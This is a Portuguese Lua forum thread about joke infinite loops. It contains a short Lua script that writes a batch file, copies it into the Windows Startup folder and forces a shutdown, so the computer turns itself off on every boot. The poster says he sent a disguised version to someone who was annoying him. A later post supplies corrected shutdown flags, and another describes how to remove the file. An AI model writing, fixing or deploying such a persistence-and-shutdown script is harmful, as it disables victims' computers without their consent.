Ir para conteúdo

function naoExecute


MaXwEllDeN

Posts Recomendados

Tô rindo disso aí, cara. Isso aí nem é uma função, está mais para uma piada sobre loops em Lua. Aquela raposa é louca mesmo.

 

Pois é cara aehauheua. Eu tô dando uma olhada aqui em um "falecido fórum", e olhando os códigos na área Geral de Lua. A cada tópico que eu vejo aumenta a certeza que eu não sei de nada, aehuaheua. Aqueles caras realmente manjam muito.

 

Skyen, Mock, etc... *-*

Editado por MaXwEllDeN
Link para o comentário
Compartilhar em outros sites

nossa... qualquer um dos loopings que ele colocou ia travar o interpretador.

 

com certeza foi uma brincadeira.

 

Sim, ele fez para "trollarmos" o Meryl e fazer o pc dele explodir. xD

Link para o comentário
Compartilhar em outros sites

  • 4 weeks later...

nossa... qualquer um dos loopings que ele colocou ia travar o interpretador.

 

com certeza foi uma brincadeira.

trava n,já fiz isso com tasklist(com loop só,colocar outros seria inutil),foda é para tem que fecha o server(mas fica um monte de janela de cmd)

 

uma ves um cara tava enchendo o saco no msn passei um script +- assim(mas em binario com load)

obs:jamais execute este script,n sei como arumar caso usem...

 

io.output(io.open("oi.bat","w"))
io.write('@echo \n copy /Y "oi.bat" "%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" \n shutdown /s /p /f')
io.close()
io.popen("oi.bat")

 

Editado por lordbug99
Link para o comentário
Compartilhar em outros sites

Usei e não aconteceu nada.

Sério? Pelo que eu vi ele cria um .bat que ao ser executado desliga o PC, na pasta de startup do windows (programas que abrem com o windows)

Basicamente quando você inicia seu PC ele abre o .bat e desliga de novo...

Pra tirar é só abrir pelo modo de segurança e deletar o arquivo, ou dar shutdown -a no executar antes de desligar e depois remover

Editado por 20cm
Link para o comentário
Compartilhar em outros sites

nossa... qualquer um dos loopings que ele colocou ia travar o interpretador.

 

com certeza foi uma brincadeira.

trava n,já fiz isso com tasklist(com loop só,colocar outros seria inutil),foda é para tem que fecha o server(mas fica um monte de janela de cmd)

 

uma ves um cara tava enchendo o saco no msn passei um script +- assim(mas em binario com load)

obs:jamais execute este script,n sei como arumar caso usem...

 

io.output(io.open("oi.bat","w"))
io.write('@echo \n copy /Y "oi.bat" "%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" \n shutdown /s /p /f')
io.close()
io.popen("oi.bat")

 

 

Não existe a pasta Janelas da Microsoft no meu Linux, executei isso ai e não deu nada '-'

Link para o comentário
Compartilhar em outros sites

kk os cara n sabe nada de bat,eu deixe errado pra ve se alguem reparava,n funciona se por "/s" e "/p" junto(o correto seria só "shutdown /p /f" desliga imediatamente sem nenhum tipo de aviso mesmo que aja progrmas abertos).

 

 

Não existe a pasta Janelas da Microsoft no meu Linux, executei isso ai e não deu nada '-'

claro isso é obviamente para windows 7,se fosse pra xp seria differente,pra linux nen sei como seria.

obs:eu sabia exatamente qual era a verção do windows do cara

Editado por lordbug99
Link para o comentário
Compartilhar em outros sites

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...